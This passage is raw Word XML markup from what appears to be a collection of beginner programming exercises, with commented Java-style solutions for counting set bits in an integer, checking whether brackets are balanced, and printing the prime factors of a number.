      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="005F61EB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00486E4D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Count</w:t>
      </w:r>
      <w:r w:rsidR="005F61EB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> set bits in an integer Ex: 13 -&gt; 1101 Print number of 1’s in the given binary number</w:t>
      </w:r>
      <w:r w:rsidR="003073F6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="328"/>
    </w:p>
    <w:p w14:paraId="1ABC8DB3" w14:textId="7B563BAA" w:rsidR="001B04CB" w:rsidRPr="00CE4B95" w:rsidRDefault="001B04CB" w:rsidP="001B04CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Approach – 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211F4B8D" w14:textId="77777777"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ountSetBit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8A215B9" w14:textId="77777777"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0D282836" w14:textId="77777777"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ethod to count set bits in the integer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589B5677" w14:textId="77777777"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countSetBit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A50EB92" w14:textId="77777777"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cou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6D6A1FCC" w14:textId="77777777"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1B52B432" w14:textId="77777777"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Loop until n becomes 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED7A8F9" w14:textId="77777777"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whi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27A24E2" w14:textId="77777777"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ncrement count if the least significant bit is 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E5D66E" w14:textId="77777777"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            cou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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</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26601C1E" w14:textId="77777777"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502382CA" w14:textId="77777777"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Right shift n by 1 to check the next bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5D5BB1" w14:textId="77777777"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            n </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&g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01938D1E" w14:textId="77777777"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4995619" w14:textId="77777777"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5988B846" w14:textId="77777777"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count</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D124DCD" w14:textId="77777777"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C93996F" w14:textId="44120BA2"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571EF99" w14:textId="77777777"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umb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Example number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0183DE" w14:textId="77777777"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082CB9D6" w14:textId="77777777"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Get the number of set bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E20695" w14:textId="77777777"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setBitsCou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ountSetBi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umber</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182352AE" w14:textId="77777777"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1E279ACE" w14:textId="77777777"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int the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706A9026" w14:textId="77777777"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umber of set bits in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b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is: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etBitsCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4328EE4D" w14:textId="77777777"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6A9D134" w14:textId="0EEC9146" w:rsidR="000633B0" w:rsidRPr="00CE4B95"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29D835A2" w14:textId="77777777" w:rsidR="00D612F3" w:rsidRPr="00CE4B95" w:rsidRDefault="00D612F3" w:rsidP="005B1A3B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7243FAE3" w14:textId="22B8A0FE" w:rsidR="005B1A3B" w:rsidRPr="00CE4B95" w:rsidRDefault="005B1A3B" w:rsidP="005B1A3B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Approach – 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CD3B98" w14:textId="77777777" w:rsidR="005B1A3B" w:rsidRPr="00CE4B95"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ountSetBit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773EF17" w14:textId="77777777" w:rsidR="005B1A3B" w:rsidRPr="00CE4B95"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5A81A06" w14:textId="77777777" w:rsidR="005B1A3B" w:rsidRPr="00CE4B95"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umb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Example number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFB3BC2" w14:textId="77777777" w:rsidR="005B1A3B" w:rsidRPr="00CE4B95"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5D306AC0" w14:textId="77777777" w:rsidR="005B1A3B" w:rsidRPr="00CE4B95"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Get the number of set bits using built-in method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257C2975" w14:textId="77777777" w:rsidR="005B1A3B" w:rsidRPr="00CE4B95"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setBitsCou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itCou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umber</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274F41F3" w14:textId="77777777" w:rsidR="005B1A3B" w:rsidRPr="00CE4B95"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26A1D5F4" w14:textId="77777777" w:rsidR="005B1A3B" w:rsidRPr="00CE4B95"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int the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2999C0D7" w14:textId="77777777" w:rsidR="005B1A3B" w:rsidRPr="00CE4B95"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umber of set bits in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b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is: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etBitsCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A87D1B9" w14:textId="77777777" w:rsidR="005B1A3B" w:rsidRPr="00CE4B95"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332D035" w14:textId="092D6EF8" w:rsidR="005B1A3B" w:rsidRPr="00CE4B95"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5068296D" w14:textId="77777777" w:rsidR="000633B0" w:rsidRPr="00CE4B95" w:rsidRDefault="000633B0" w:rsidP="000633B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C153BD5" w14:textId="72A255C4" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="329" w:name="_Toc196307809"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00874717" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Check bracket balanced</w:t>
      </w:r>
      <w:r w:rsidR="00C96AE1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or not</w:t>
      </w:r>
      <w:bookmarkEnd w:id="329"/>
    </w:p>
    <w:p w14:paraId="430FD339" w14:textId="77777777" w:rsidR="00BC0CC6" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239" w:rsidP="00BC0CC6">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00BC0CC6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to balancing of the brackets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A50B27" w14:textId="742D3FF4" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00547D7C" w:rsidP="00036601">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidR="00BC0CC6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Input - {[(a+b)+c]+x+y]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A9E0E3" w14:textId="48380EBC" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E9F6814"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ack</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34688156"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28369151"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BalancedBracket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071986E"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30F1A328"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ethod to check if the brackets are balanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410CFE49"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areBracketsBalanced</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exp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A841EAC"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tack to store opening brackets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29997265"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ack</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Charact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stack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ack</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC65239"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194D4421"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raverse the expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443B5D5C"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exp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479752E"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har</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ch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xp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harA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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329128A0"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05D03D79"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f the character is an opening bracket, push it onto the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D2F90A"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ch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h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h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8A8C34E"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stac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s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h</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D597CE6"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D195D2B"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f the character is a closing bracket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61181DC0"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ls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ch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h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h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53A3480"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heck if the stack is empty (no matching opening bracket)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FD05F7"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ac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Empt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9DAAB20"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24E3AEA9"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DB06089"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op the top element from the stack and check for matching pair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02744B21"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har</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to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ac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op</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4272DEEB"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ch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amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to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ch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amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to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ch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amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to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BDEC479"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3C244467"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660F337"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05F6FFA"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857B258"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6761C2B7"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f the stack is empty, the brackets are balanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C77E423"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stac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Empty</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E77DDA6"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77ECEFF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D7CE20"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00B7205"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expressio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b)+c]+x+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Example input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32222633"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63203A15"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heck if the brackets are balanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66612360"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reBracketsBalance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xpress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796FB5C"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The brackets are balanced."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3635B7F6"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ls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5DF3368"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The brackets are not balanced."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC3EADC"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D15B7BC" w14:textId="77777777"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1468A94" w14:textId="126A9085" w:rsidR="00184653" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7772FF18" w14:textId="77777777" w:rsidR="00184653" w:rsidRPr="00CE4B95" w:rsidRDefault="00184653" w:rsidP="00184653">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607BB376" w14:textId="57FB84A4" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="330" w:name="_Toc196307810"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00C37F6D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Print prime factors for given numbers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="330"/>
    </w:p>
    <w:p w14:paraId="23F727E7" w14:textId="30FA7CED" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A1B912"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rimeFactor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545AB45"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC87E11"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ethod to print prime factors of a number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0298F95E"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printPrimeFactor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1A33E8D"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First, handle the smallest prime factor 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA371EE"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whi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F56859C"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2</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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45509CD2"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p>
    <w:p w14:paraId="409CF463"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0585A79"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3893AC00"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Now, check for odd numbers starting from 3 to sqrt(n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143A3FE3"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9B1B0AC"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whi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0D37BB8"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3E1563"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p>
    <w:p w14:paraId="54C7651C"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07EBD77"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9372CFD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C5A692"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f n is still greater than 2, then it must be prime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D943160"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9371B8D"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7228A45F"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C36BA8A"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A9EF481"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F16F7CB"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F2CF532"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umb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6</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Example number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC75FD3"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3DB3E16B"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int prime factors of the number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DB8F74"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rime factors of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b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are: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1B16DA"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printPrimeFacto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umber</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C488E7F" w14:textId="7777777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C4D5D37" w14:textId="179D67B7" w:rsidR="009F7A7E" w:rsidRPr="00CE4B95"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021C938B" w14:textId="77777777" w:rsidR="009F7A7E" w:rsidRPr="00CE4B95" w:rsidRDefault="009F7A7E" w:rsidP="009F7A7E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DB6118B" w14:textId="0A0E8695" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
